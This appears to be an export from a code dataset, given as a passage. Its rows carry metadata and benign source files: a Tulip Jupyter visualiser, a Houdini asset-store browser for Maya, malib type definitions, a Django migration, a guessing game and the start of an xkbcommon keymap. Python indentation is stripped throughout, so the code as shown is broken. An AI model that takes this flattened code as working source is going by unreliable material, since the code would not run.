});
});
</script>
""")
def copyNeededFilesToWebServer():
nbextension = True
try:
if IPython.version_info[0] >= 4:
from notebook import install_nbextension
else:
from IPython.html import install_nbextension
except ImportError:
nbextension = False
moduleDir = os.path.dirname(os.path.abspath(__file__))
tulipjs_files = os.path.join(moduleDir, 'tulipjs')
required_files = [tulipjs_files]
if nbextension:
def _install_nbextension(extensions):
"""Wrapper for IPython.html.install_nbextension."""
if IPython.version_info[0] >= 3:
for extension in extensions:
install_nbextension(extension, user=True, verbose=0)
else:
install_nbextension(extensions, verbose=0)
try:
_install_nbextension(required_files)
except IOError:
# files may be read only. We'll try deleting them and re-installing
from IPython.utils.path import get_ipython_dir
nbext = os.path.join(get_ipython_dir(), "nbextensions")
for req_file in required_files:
dest = os.path.join(nbext, os.path.basename(req_file))
if os.path.exists(dest):
os.remove(dest)
_install_nbextension(required_files)
prefix = '/nbextensions/tulipjs/'
urls = {}
urls['tulipjs'] = prefix + 'tulip.js'
urls['base64utilsjs'] = prefix + 'base64utils.js'
urls['jquerytoolbarjs'] = prefix + 'jquery.toolbar.min.js'
urls['jquerytoolbarcss'] = prefix + 'css/jquery.toolbar.css'
urls['fontawesomecss'] = prefix + 'css/font-awesome.min.css'
return urls
def getGraphVisualizationHTML(graph):
vizid = 'fig_el' + str(int(random.random() * 1E10))
urls = copyNeededFilesToWebServer()
dirpath = tempfile.mkdtemp()
tmpGraphFile = os.path.join(dirpath, 'graph.tlpb.gz')
tlp.saveGraph(graph, tmpGraphFile)
tlpbgzGraphData = open(tmpGraphFile, 'rb').read()
if sys.version_info[0] == 3:
tlpbgzGraphDataBase64 = str(base64.b64encode(tlpbgzGraphData), 'utf-8')
else:
tlpbgzGraphDataBase64 = base64.b64encode(tlpbgzGraphData)
shutil.rmtree(dirpath)
return TULIPJS_HTML.render(vizid=vizid,
tulipjs_url=urls['tulipjs'],
base64utils_url=urls['base64utilsjs'],
jquerytoolbarjs_url=urls['jquerytoolbarjs'],
jquerytoolbarcss_url=urls['jquerytoolbarcss'],
fontawesomecss_url=urls['fontawesomecss'],
tlpbgz_graph_base64=tlpbgzGraphDataBase64)
def display(graph):
ipythondisplay(graph)
ip = get_ipython()
formatter = ip.display_formatter.formatters['text/html']
formatter.for_type(tlp.Graph, lambda graph: getGraphVisualizationHTML(graph))
| 33.413919 | 171 | 0.623986 | 965 | 9,122 | 5.835233 | 0.297409 | 0.00959 | 0.023619 | 0.012431 | 0.223229 | 0.127508 | 0.113124 | 0.064642 | 0.064642 | 0.064642 | 0 | 0.015782 | 0.215084 | 9,122 | 272 | 172 | 33.536765 | 0.77067 | 0.041986 | 0 | 0.17757 | 0 | 0.060748 | 0.679918 | 0.204376 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018692 | false | 0 | 0.093458 | 0 | 0.121495 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e47902a10071cf7f3d6d93e2ed2545f7b79c7b3 | 9,396 | py | Python | houdini_engine_for_maya/asset_store.py | sonictk/HoudiniEngineForMaya | 0dd3609ae781a20b26219f87388f030c933273c6 | [
"MIT"
] | 86 | 2015-01-11T00:26:02.000Z | 2021-11-08T09:36:01.000Z | houdini_engine_for_maya/asset_store.py | sonictk/HoudiniEngineForMaya | 0dd3609ae781a20b26219f87388f030c933273c6 | [
"MIT"
] | 7 | 2015-04-16T14:44:35.000Z | 2017-09-01T18:55:01.000Z | houdini_engine_for_maya/asset_store.py | sonictk/HoudiniEngineForMaya | 0dd3609ae781a20b26219f87388f030c933273c6 | [
"MIT"
] | 46 | 2015-02-05T00:04:48.000Z | 2021-11-11T20:43:35.000Z | import json
import os
import re
import sys
import maya.cmds as cmds
import maya.mel as mel
current_user = None
asset_size = 100
child_entries_margin = 5
child_assets_column = 3
asset_store_window = "houdiniEngineAssetStoreWindow"
change_user_menu_item = "houdiniEngineAssetStoreChangeUserMenuItem"
asset_entries_scroll_layout = "houdiniEngineAssetStoreEntriesScrollLayout"
def get_store_path():
if "HOUDINI_ASSET_STORE_PATH" in os.environ:
return os.environ["HOUDINI_ASSET_STORE_PATH"]
houdini_version = cmds.houdiniEngine(houdiniVersion = True).split(".")
# Get Houdini prefs directory
houdini_prefs_path = None
if sys.platform.startswith("linux"):
houdini_prefs_path = os.path.expanduser(
"~/houdini{0}.{1}".format(
houdini_version[0], houdini_version[1]
)
)
elif sys.platform.startswith("win32"):
houdini_prefs_path = os.path.expanduser(
"~/houdini{0}.{1}".format(
houdini_version[0], houdini_version[1]
)
)
elif sys.platform.startswith("darwin"):
houdini_prefs_path = os.path.expanduser(
"~/Library/Preferences/houdini/{0}.{1}".format(
houdini_version[0], houdini_version[1]
)
)
else:
raise Exception("Cannot determine asset store path. Unknown OS.")
asset_store_path = os.path.join(houdini_prefs_path, "asset_store")
return asset_store_path
def get_store_user_path():
user = get_store_current_user()
users_root = get_users()
user_dir = None
if users_root and user in users_root["users"]:
user_dir = users_root["users"][user]
if not user_dir:
user_dir = "default"
return os.path.join(get_store_path(), user_dir)
def get_store_users_path():
return os.path.join(get_store_path(), "users.json")
def get_store_installed_assets_path():
return os.path.join(get_store_user_path(), "installed_assets.json")
def get_store_otls_path():
return os.path.join(get_store_user_path(), "otls")
def get_store_icons_path():
return os.path.join(get_store_user_path(), "icons")
def get_store_licenses_path():
return os.path.join(get_store_user_path(), "licenses")
def get_store_current_user():
global current_user
if not current_user:
users_root = get_users()
if users_root and "default_user" in users_root:
current_user = users_root["default_user"]
if not current_user:
print "Warning: Cannot determine default user for asset store."
return current_user
def get_users():
users_json = get_store_users_path()
if not os.path.exists(users_json):
return None
users_root = None
with open(users_json, "r") as f:
users_root = json.load(f)
return users_root
def get_installed_assets():
installed_assets_json = get_store_installed_assets_path()
if not os.path.exists(installed_assets_json):
return None
installed_assets_root = None
with open(installed_assets_json, "r") as f:
installed_assets_root = json.load(f)
return installed_assets_root
def get_asset_license(otl_file):
license_json = os.path.join(get_store_licenses_path(),
re.sub("\\.otl$|\\.hda$|\\.otllc$|\\.hdalc$|\\.otlnc$|\\.hdanc$", ".json", otl_file))
license_root = None
with open(license_json, "r") as f:
license_root = json.load(f)
return license_root
def load_asset(otl_file, asset):
cmds.houdiniAsset(loadAsset=[otl_file, asset])
def create_asset_entry(asset):
form_layout = cmds.formLayout(width = asset_size, height = asset_size)
if "otl_file" in asset:
license = get_asset_license(asset["otl_file"])
otl_file = os.path.join(get_store_otls_path(), asset["otl_file"])
m = re.match("([^:]*)::(.*)", asset["node_type_name"])
asset_name = "{0}::{1}/{2}".format(
m.group(1),
license["category_name"],
m.group(2),
)
cmds.symbolButton(
annotation = asset["descriptive_name"],
image = os.path.join(get_store_icons_path(), asset["icon"]),
width = asset_size, height = asset_size,
command = lambda *args: load_asset(otl_file, asset_name)
)
elif "update_available" in asset and asset["update_available"]:
cmds.symbolButton(
annotation = asset["descriptive_name"],
image = os.path.join(get_store_icons_path(), asset["icon"]),
width = asset_size, height = asset_size,
)
cmds.text(
label = "Update available. Use Houdini to update asset.",
width = asset_size, height = asset_size,
wordWrap = True,
)
text = cmds.text(
label = asset["descriptive_name"],
backgroundColor = [0,0,0],
align = "right",
)
cmds.formLayout(
form_layout,
edit = True,
width = asset_size, height = asset_size,
attachForm = [[text, "left", 0], [text, "right", 0], [text, "bottom", 0]],
)
cmds.setParent(upLevel = True)
def compare_asset_entry(x, y):
if x["type"] == "folder" and y["type"] == "folder":
if x["name"] < y["name"]:
return -1
else:
return 1
elif x["type"] == "asset" and y["type"] == "asset":
return -1
elif x["type"] == "asset" and y["type"] == "folder":
return -1
elif x["type"] == "folder" and y["type"] == "asset":
return 1
def create_asset_entries(entries):
in_assets_layout = False
cmds.columnLayout(adjustableColumn = True)
for entry in sorted(entries, cmp = compare_asset_entry):
if entry["type"] == "folder":
if in_assets_layout:
in_assets_layout = False
cmds.setParent(upLevel=True)
cmds.frameLayout(
collapsable = True,
label = entry["name"],
marginWidth = child_entries_margin
)
create_asset_entries(entry["entries"])
cmds.setParent(upLevel = True)
elif entry["type"] == "asset":
if not in_assets_layout:
in_assets_layout = True
cmds.gridLayout(
numberOfColumns = child_assets_column,
cellWidthHeight = [asset_size, asset_size]
)
create_asset_entry(entry)
if in_assets_layout:
in_assets_layout = False
cmds.setParent(upLevel = True)
cmds.setParent(upLevel = True)
def change_user(user):
current_user = user
refresh_asset_entries()
def change_user_post_menu_command(*args):
cmds.menu(
change_user_menu_item,
edit = True,
deleteAllItems = True,
)
cmds.setParent(change_user_menu_item, menu = True)
users_root = get_users()
if not users_root:
return
current_user = get_store_current_user()
for user in users_root["users"]:
cmds.menuItem(
label = user,
command = lambda user=user: change_user(user),
radioButton = user == current_user
)
def refresh_asset_entries(*args):
if not cmds.window(asset_store_window, exists = True):
return
cmds.setParent(asset_store_window)
# Delete the existing layout
if cmds.scrollLayout(asset_entries_scroll_layout, exists = True):
cmds.deleteUI(asset_entries_scroll_layout)
installed_assets = get_installed_assets()
cmds.scrollLayout(asset_entries_scroll_layout, childResizable = True)
if installed_assets \
and installed_assets["organization"]["entries"]:
create_asset_entries(installed_assets["organization"]["entries"])
else:
cmds.text(
label = "There are no Orbolt assets installed for this user.<br />"
"Please visit the <a href=\"http://www.orbolt.com/maya\">Orbolt Store</a> for assets.",
wordWrap = True,
hyperlink = True,
)
cmds.setParent(upLevel = True)
def close_asset_store_window(*args):
cmds.deleteUI(asset_store_window)
def show_asset_store_window():
if cmds.window(asset_store_window, exists = True):
cmds.showWindow(asset_store_window)
return
cmds.window(
asset_store_window,
title = "Orbolt Asset Browser",
menuBar = True,
)
cmds.menu(label = "File", tearOff = True)
cmds.menuItem(
change_user_menu_item,
label = "Change User",
subMenu = True,
postMenuCommand = change_user_post_menu_command,
)
cmds.setParent(menu = True, upLevel = True);
cmds.menuItem(divider = True)
cmds.menuItem(label = "Refresh Asset List", command = refresh_asset_entries)
cmds.menuItem(divider = True)
cmds.menuItem(label = "Close", command = close_asset_store_window)
cmds.setParent(menu = True, upLevel = True);
refresh_asset_entries()
cmds.showWindow(asset_store_window)
| 29.54717 | 103 | 0.60845 | 1,096 | 9,396 | 4.943431 | 0.17062 | 0.032484 | 0.032484 | 0.023994 | 0.3732 | 0.280362 | 0.188446 | 0.149317 | 0.149317 | 0.112034 | 0 | 0.005213 | 0.285441 | 9,396 | 317 | 104 | 29.640379 | 0.801758 | 0.005747 | 0 | 0.274262 | 0 | 0 | 0.114252 | 0.029232 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.025316 | null | null | 0.004219 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e4a036e76c60a887c51d8589ef8cb77edd3715f | 14,051 | py | Python | malib/utils/typing.py | zbzhu99/malib | 5be07ac00761a34fb095adb2b3018a798ceea256 | [
"MIT"
] | null | null | null | malib/utils/typing.py | zbzhu99/malib | 5be07ac00761a34fb095adb2b3018a798ceea256 | [
"MIT"
] | null | null | null | malib/utils/typing.py | zbzhu99/malib | 5be07ac00761a34fb095adb2b3018a798ceea256 | [
"MIT"
] | null | null | null | import enum
import time
from collections import namedtuple
from dataclasses import dataclass, field
from typing import List, Dict, Any, Union, Tuple, Sequence, Callable, Optional
import gym
import numpy as np
from malib.utils.notations import deprecated
""" Rename and definition of basic data types which are correspond to the inputs (args, kwargs) """
PolicyConfig = Dict[str, Any]
MetaPolicyConfig = Tuple[gym.spaces.Space, gym.spaces.Space, Sequence[PolicyConfig]]
EnvConfig = Dict[str, Any]
RolloutConfig = Dict[str, Any]
ParameterLibConfig = Dict[str, Any]
DatasetConfig = Dict[str, Any]
TrainingConfig = Dict[str, Any]
ModelConfig = Dict[str, Any]
AgentConfig = Dict[str, TrainingConfig]
AgentID = str
PolicyID = str
EnvID = str
EpisodeID = str
DataBlockID = str
DataTransferType = np.ndarray
EnvObservationType = Any
# next_observation, rewards, done, infos
StandardEnvReturns = Tuple[
Dict[str, DataTransferType],
Dict[str, float],
Dict[str, bool],
Dict[str, Any],
]
# TODO(ming): mute info temporally to avoid data transferring errors
StandardTransition = namedtuple(
# "StandardTransition", "obs, new_obs, action, reward, done, info"
"StandardTransition",
"obs, new_obs, actions, rewards, dones",
)
ObservationSpaceType = gym.spaces.Space
ActionSpaceType = gym.spaces.Space
""" For task categorical and status tagging """
class TaskType(enum.Enum):
ASYNC_LEARNING = "async_learning"
ADD_WORKER = "add_worker"
SAVE_MODEL = "save_model"
LOAD_MODEL = "load_model"
OPTIMIZE = "optimization"
ROLLOUT = "rollout"
UPDATE_PARAMETER = "update_PARAMETER"
PULL_PARAMETER = "pull_parameter"
PUSH_PARAMETER = "push_parameter"
SAMPLE_BATCH = "sample_batch"
PUSH_SAMPLES = "push_samples"
NO = "no"
TRAINING_EVALUATE = "evaluate_for_training"
ROLLOUT_EVALUATE = "evaluate_for_rollouts"
ADD_POLICY = "add_policy"
UPDATE_POPULATION = "update_population"
EVALUATE = "evaluate"
EVALUATE_WRITE_BACK = "evaluate_write_back"
INIT = "initialization"
CHECK_ADD = "check_add"
TERMINATE = "terminate"
SIMULATION = "simulation"
UPDATE_PAYOFFTABLE = "update_payofftable"
class Status(enum.Enum):
TERMINATE = "terminate"
NORMAL = "normal"
LOCKED = "locked"
WAITING = "waiting"
SUCCESS = "success"
IDLE = "idle"
IN_PROGRESS = "in progress"
EXCEED = "exceed"
FAILED = "failed"
class Paradigm(enum.Enum):
MARL = "marl"
META_GAME = "meta_game"
class BehaviorMode(enum.IntEnum):
"""Behavior mode, indicates environment agent behavior"""
EXPLORATION = 0
"""Trigger exploration mode"""
EXPLOITATION = 1
"""Trigger exploitation mode"""
class MetricType:
REWARD = "reward"
"""Reward"""
LIVE_STEP = "live_step"
"""Agent live step"""
REACH_MAX_STEP = "reach_max_step"
"""Whether reach max step or not"""
Parameter = Any
""" Description: """
@dataclass
class ParameterDescription:
class Type:
PARAMETER = "parameter"
GRADIENT = "gradient"
time_stamp: float
identify: str # meta policy id
env_id: str
id: PolicyID
type: str = Type.PARAMETER
lock: bool = False
description: Any = None
data: Parameter = None
parallel_num: int = 1
version: int = -1
@classmethod
def gen_template(cls, **kwargs):
return cls(
time_stamp=time.time(),
identify=kwargs.get("identify", None),
id=kwargs["id"],
lock=kwargs.get("lock", True),
env_id=kwargs.get("env_id", "test"),
type=kwargs.get("type", cls.Type.PARAMETER),
data=kwargs.get("data", None),
description=kwargs.get(
"description",
{
"registered_name": "test",
"observation_space": None,
"action_space": None,
"model_config": {},
"custom_config": {},
},
),
)
@dataclass
class MetaParameterDescription:
meta_pid: PolicyID
parameter_desc_dict: Dict[PolicyID, ParameterDescription]
timestamp: float = time.time()
identify: str = "MetaParameterDescription" # meta policy id
def __post_init__(self):
self.identify = f"{self.identify}_mpid_{self.meta_pid}_{self.timestamp}"
@classmethod
def gen_template(cls, **kwargs):
return cls(
meta_pid=kwargs["meta_pid"],
parameter_desc_dict={
k: ParameterDescription.gen_template(id=k) for k in kwargs["pids"]
},
)
@dataclass
class BufferDescription:
env_id: str
agent_id: Union[AgentID, List[AgentID]]
policy_id: Union[PolicyID, List[PolicyID]]
batch_size: int = 0
sample_mode: str = ""
indices: List[int] = None
data: Any = None
data_shapes: Dict[str, Tuple] = None
sample_start_size: int = 0
capacity: int = 1000
identify: str = None
def __post_init__(self):
if self.identify is None:
self.identify = "_".join(sorted(self.agent_id))
def __str__(self):
return "<BufferDescription: agent_id={} policy_id={}".format(
self.agent_id, self.policy_id
)
@dataclass
class AgentInvolveInfo:
"""`AgentInvolveInfo` describes the trainable pairs, populations, environment id and the
meta parameter descriptions.
"""
training_handler: str
trainable_pairs: Dict[AgentID, Tuple[PolicyID, PolicyConfig]]
""" describe the environment agent id and their binding policy configuration """
populations: Dict[AgentID, Sequence[Tuple[PolicyID, PolicyConfig]]]
""" describe the policy population of agents """
env_id: str = None
""" environment id """
meta_parameter_desc_dict: Dict[AgentID, MetaParameterDescription] = None
""" meta parameter description """
@classmethod
def gen_template(
cls,
agent_ids: List[AgentID],
observation_space: gym.Space,
action_space: gym.Space,
):
example_ptup = (
"policy_0",
{
"registered_name": "test",
"observation_space": observation_space,
"action_space": action_space,
"mode_config": None,
"custom_config": None,
},
)
return cls(
training_handler="test",
trainable_pairs=dict.fromkeys(agent_ids, example_ptup),
populations=dict.fromkeys(agent_ids, [example_ptup]),
env_id="test",
meta_parameter_desc_dict=dict.fromkeys(
agent_ids,
MetaParameterDescription.gen_template(meta_pid=None, pids=["policy_0"]),
),
)
@dataclass
class TrainingDescription:
agent_involve_info: AgentInvolveInfo
stopper: str = "none"
stopper_config: Dict[str, Any] = field(default_factory=dict)
policy_distribution: Dict[AgentID, Dict[PolicyID, float]] = None
update_interval: int = 1
batch_size: int = 64
mode: str = "step"
time_stamp: float = time.time()
@classmethod
def gen_template(cls, **template_attr_kwargs):
raise NotImplementedError
@dataclass
class RolloutDescription:
agent_involve_info: AgentInvolveInfo
fragment_length: int
num_episodes: int
episode_seg: int
terminate_mode: str
mode: str # on_policy or off_policy or imitation learning ?
# parameter_desc_seq: Sequence[MetaParameterDescription] = None
callback: Union[str, Callable] = "sequential"
stopper: str = "none"
stopper_config: Dict[str, Any] = field(default_factory=dict)
policy_distribution: Dict[AgentID, Dict[PolicyID, float]] = None
time_stamp: float = time.time()
@classmethod
def gen_template(cls, **template_attr_kwargs):
agent_involve_info_kwargs = template_attr_kwargs.pop("agent_involve_info")
instance = cls(
agent_involve_info=AgentInvolveInfo.gen_template(
**agent_involve_info_kwargs
),
policy_distribution=dict.fromkeys(
agent_involve_info_kwargs["agent_ids"], {"policy_0": 1.0}
),
**template_attr_kwargs,
)
template_attr_kwargs["agent_involve_info"] = agent_involve_info_kwargs
return instance
@dataclass
class SimulationDescription:
agent_involve_info: AgentInvolveInfo
policy_combinations: List[Dict[AgentID, Tuple[PolicyID, PolicyConfig]]]
num_episodes: int
callback: Union[str, Callable] = "sequential"
max_episode_length: int = None
time_stamp: float = time.time()
@classmethod
def gen_template(cls, **kwargs):
agent_involve_template_attrs = kwargs.pop("agent_involve_info")
instance = cls(
agent_involve_info=AgentInvolveInfo.gen_template(
**agent_involve_template_attrs
),
**kwargs,
)
kwargs["agent_involve_info"] = agent_involve_template_attrs
return instance
@dataclass
class TrainingFeedback:
agent_involve_info: AgentInvolveInfo
statistics: Dict[AgentID, Any]
@dataclass
class RolloutFeedback:
"""RolloutFeedback for rollout tasks"""
worker_idx: str
"""id of rollout worker"""
agent_involve_info: AgentInvolveInfo
"""agent involve info describes the ..."""
statistics: Dict[str, Any]
policy_combination: Dict[PolicyID, PolicyID] = None
def __post_init__(self):
pass
# for res in self.statistics.values():
# for k, v in res.items():
# if isinstance(v, MetricEntry):
# res[k] = v.value
@deprecated
@dataclass
class EvaluationFeedback:
# env_id: str
agent_involve_info: AgentInvolveInfo
statistics: Dict[PolicyID, Dict[str, Any]]
policy_combination: Dict[PolicyID, Tuple[PolicyID, PolicyConfig]]
@dataclass
class TaskDescription:
"""TaskDescription is a general description of
Training, Rollout and Simulation tasks.
"""
task_type: TaskType
"""task type used to identify which task description will be used"""
content: Union[TrainingDescription, RolloutDescription, SimulationDescription]
"""content is a detailed task description entity"""
state_id: Any
timestamp: float = None
source_task_id: str = None
identify: str = None
def __post_init__(self):
timestamp = time.time()
self.timestamp = timestamp
if self.task_type == TaskType.OPTIMIZE:
prefix = "TrainingDescription"
elif self.task_type == TaskType.ROLLOUT:
prefix = "RolloutDescription"
elif self.task_type == TaskType.SIMULATION:
prefix = "SimulationDescription"
else:
prefix = "UnknowDescription"
self.identify = f"{prefix}_{timestamp}"
@classmethod
def gen_template(cls, **template_attr_kwargs):
task_type = template_attr_kwargs["task_type"]
if task_type == TaskType.OPTIMIZE:
desc_cls = TrainingDescription
elif task_type == TaskType.ROLLOUT:
desc_cls = RolloutDescription
elif task_type == TaskType.SIMULATION:
desc_cls = SimulationDescription
else:
raise ValueError("Unknow task type: {}".format(task_type))
content_template_attr_kwargs = template_attr_kwargs.pop("content")
instance = cls(
content=desc_cls.gen_template(**content_template_attr_kwargs),
**template_attr_kwargs,
)
template_attr_kwargs["content"] = content_template_attr_kwargs
return instance
@dataclass
class TaskRequest:
"""TaskRequest is a description of"""
task_type: TaskType
"""defines the requested task type"""
content: Any
"""content is the feedback of current handler which request for next task"""
state_id: str
timestamp: float = None # time.time()
identify: str = None
computing_mode: str = "bulk_sync" # bulk_sync, async
def __post_init__(self):
assert self.state_id, "State id cannot be None"
timestamp = time.time()
self.timestamp = timestamp
self.identify = f"TaskRequest_{timestamp}"
@staticmethod
def from_task_desc(task_desc: TaskDescription, **kwargs) -> "TaskRequest":
return TaskRequest(
task_type=kwargs.get("task_type", task_desc.task_type),
content=kwargs.get("content", task_desc.content),
state_id=kwargs.get("state_id", task_desc.state_id),
timestamp=kwargs.get("timestamp", None),
identify=kwargs.get("identify", None),
)
class BColors:
HEADER = "\033[95m"
OKBLUE = "\033[94m"
OKCYAN = "\033[96m"
OKGREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
class EvaluateResult:
CONVERGED = "converged"
AVE_REWARD = "average_reward"
REACHED_MAX_ITERATION = "reached_max_iteration"
@staticmethod
def default_result():
return {
EvaluateResult.CONVERGED: False,
EvaluateResult.AVE_REWARD: -float("inf"),
EvaluateResult.REACHED_MAX_ITERATION: False,
}
class TrainingMetric:
LOSS = "loss"
@dataclass
class BatchMetaInfo:
episode_id: str
created_time: float
meta_policy_id: str = None
policy_id: str = None
env_id: Any = None
policy_type: Any = None
class ExperimentManagerTableName:
primary: str = ""
secondary: str = ""
tag: str = ""
key: int = 0
nid: int = 0
class EventReportStatus:
START = "start"
END = "end"
# TODO(jing): add docs for MetricEntry
class MetricEntry:
def __init__(self, value: Any, agg: str = "mean", tag: str = "", log: bool = True):
self.value = value
self.agg = agg
self.tag = tag
self.log = log
def cleaned_data(self):
"""Return values"""
| 27.443359 | 99 | 0.645007 | 1,518 | 14,051 | 5.760211 | 0.224638 | 0.027447 | 0.031107 | 0.029277 | 0.224268 | 0.15279 | 0.108417 | 0.0828 | 0.067704 | 0.067704 | 0 | 0.00592 | 0.254644 | 14,051 | 511 | 100 | 27.497065 | 0.828989 | 0.059925 | 0 | 0.245283 | 0 | 0 | 0.105846 | 0.014878 | 0 | 0 | 0 | 0.003914 | 0.002695 | 1 | 0.045822 | false | 0.002695 | 0.021563 | 0.013477 | 0.539084 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e4ca410b06d109c39b6e34b77d24f4733a52823 | 1,804 | py | Python | migrations/0017_auto_20210419_1810.py | andywar65/buildings | b772c052bd779ff9a33a31f345e9860203d55bf0 | [
"BSD-2-Clause"
] | 2 | 2021-02-04T14:13:44.000Z | 2021-12-08T18:30:05.000Z | migrations/0017_auto_20210419_1810.py | andywar65/buildings | b772c052bd779ff9a33a31f345e9860203d55bf0 | [
"BSD-2-Clause"
] | null | null | null | migrations/0017_auto_20210419_1810.py | andywar65/buildings | b772c052bd779ff9a33a31f345e9860203d55bf0 | [
"BSD-2-Clause"
] | null | null | null | # Generated by Django 3.1.2 on 2021-04-19 16:10
import django.contrib.gis.db.models.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('buildings', '0016_auto_20210414_2325'),
]
operations = [
migrations.AlterModelOptions(
name='plangeometry',
options={'verbose_name': 'Geometria della planimetria', 'verbose_name_plural': 'Geometrie della planimetria'},
),
migrations.RemoveField(
model_name='plangeometry',
name='geometryz',
),
migrations.AddField(
model_name='plangeometry',
name='geomjson',
field=models.JSONField(null=True),
),
migrations.AlterField(
model_name='plangeometry',
name='geometry',
field=django.contrib.gis.db.models.fields.GeometryField(help_text='può essere LineString o Polygon', srid=4326, verbose_name='Geometria'),
),
migrations.AlterField(
model_name='plangeometry',
name='is3d',
field=models.BooleanField(default=False, help_text='Usa la terza dimensione nella vista in soggettiva', verbose_name="E' 3D"),
),
migrations.AlterField(
model_name='plangeometry',
name='plan',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='plan_geometry', to='buildings.plan', verbose_name='Geometria della planimetria'),
),
migrations.AlterField(
model_name='plangeometry',
name='popup',
field=models.CharField(help_text='Descrizione della geometria nel popup', max_length=100, verbose_name='Popup'),
),
]
| 36.816327 | 176 | 0.628049 | 181 | 1,804 | 6.132597 | 0.486188 | 0.100901 | 0.113514 | 0.135135 | 0.281081 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0.029873 | 0.257761 | 1,804 | 48 | 177 | 37.583333 | 0.799104 | 0.024945 | 0 | 0.404762 | 1 | 0 | 0.244166 | 0.013091 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
280f2cf885c0c90c1653eb09b88754da5d575fd7 | 222 | py | Python | Exercicios/ex_058.py | antoniosereno95/Python_Curso_em_Video | d706cba9ca7e5670881e5e06bceb5538971e99c0 | [
"MIT"
] | null | null | null | Exercicios/ex_058.py | antoniosereno95/Python_Curso_em_Video | d706cba9ca7e5670881e5e06bceb5538971e99c0 | [
"MIT"
] | null | null | null | Exercicios/ex_058.py | antoniosereno95/Python_Curso_em_Video | d706cba9ca7e5670881e5e06bceb5538971e99c0 | [
"MIT"
] | null | null | null | import random
r = random.randint(0,10)
count = 1
n = input('numero de 0 a 10: ')
while int(n) != int(r):
print('tente novamente: ')
count += 1
n = input()
print('parabens voce acretou em ',count,' chances.')
| 18.5 | 52 | 0.608108 | 35 | 222 | 3.857143 | 0.657143 | 0.088889 | 0.103704 | 0.177778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046243 | 0.220721 | 222 | 11 | 53 | 20.181818 | 0.734104 | 0 | 0 | 0 | 0 | 0 | 0.310811 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
28171d7b865af35b34388d5c90bafda52ae1cab9 | 65,393 | py | Python | tests/data.py | dydyamotya/python-xkbcommon | 6712ef354b59cc95d3ad057c333dd8e9b3d1a1a6 | [
"MIT"
] | 12 | 2016-08-28T12:58:47.000Z | 2021-11-14T18:18:06.000Z | tests/data.py | dydyamotya/python-xkbcommon | 6712ef354b59cc95d3ad057c333dd8e9b3d1a1a6 | [
"MIT"
] | 11 | 2020-02-01T16:15:44.000Z | 2022-02-22T16:04:01.000Z | tests/data.py | dydyamotya/python-xkbcommon | 6712ef354b59cc95d3ad057c333dd8e9b3d1a1a6 | [
"MIT"
] | 3 | 2019-05-01T11:19:12.000Z | 2021-11-06T21:20:33.000Z | # Defines sample_keymap_string and sample_keymap_bytes
# Python 2 type Python 3 type
# sample_keymap_string unicode str
# sample_keymap_bytes str bytes
# This sample keymap is the output of xkbcomp :0 [filename] on my
# system - it wasn't chosen for any other reason. Some of the tests
# may rely on its details.
sample_keymap_string = r"""
xkb_keymap {
xkb_keycodes "evdev+aliases(qwerty)" {
minimum = 8;
maximum = 255;
<ESC> = 9;
<AE01> = 10;
<AE02> = 11;
<AE03> = 12;
<AE04> = 13;
<AE05> = 14;
<AE06> = 15;
<AE07> = 16;
<AE08> = 17;
<AE09> = 18;
<AE10> = 19;
<AE11> = 20;
<AE12> = 21;
<BKSP> = 22;
<TAB> = 23;
<AD01> = 24;
<AD02> = 25;
<AD03> = 26;
<AD04> = 27;
<AD05> = 28;
<AD06> = 29;
<AD07> = 30;
<AD08> = 31;
<AD09> = 32;
<AD10> = 33;
<AD11> = 34;
<AD12> = 35;
<RTRN> = 36;
<LCTL> = 37;
<AC01> = 38;
<AC02> = 39;
<AC03> = 40;
<AC04> = 41;
<AC05> = 42;
<AC06> = 43;
<AC07> = 44;
<AC08> = 45;
<AC09> = 46;
<AC10> = 47;
<AC11> = 48;
<TLDE> = 49;
<LFSH> = 50;
<BKSL> = 51;
<AB01> = 52;
<AB02> = 53;
<AB03> = 54;
<AB04> = 55;
<AB05> = 56;
<AB06> = 57;
<AB07> = 58;
<AB08> = 59;
<AB09> = 60;
<AB10> = 61;
<RTSH> = 62;
<KPMU> = 63;
<LALT> = 64;
<SPCE> = 65;
<CAPS> = 66;
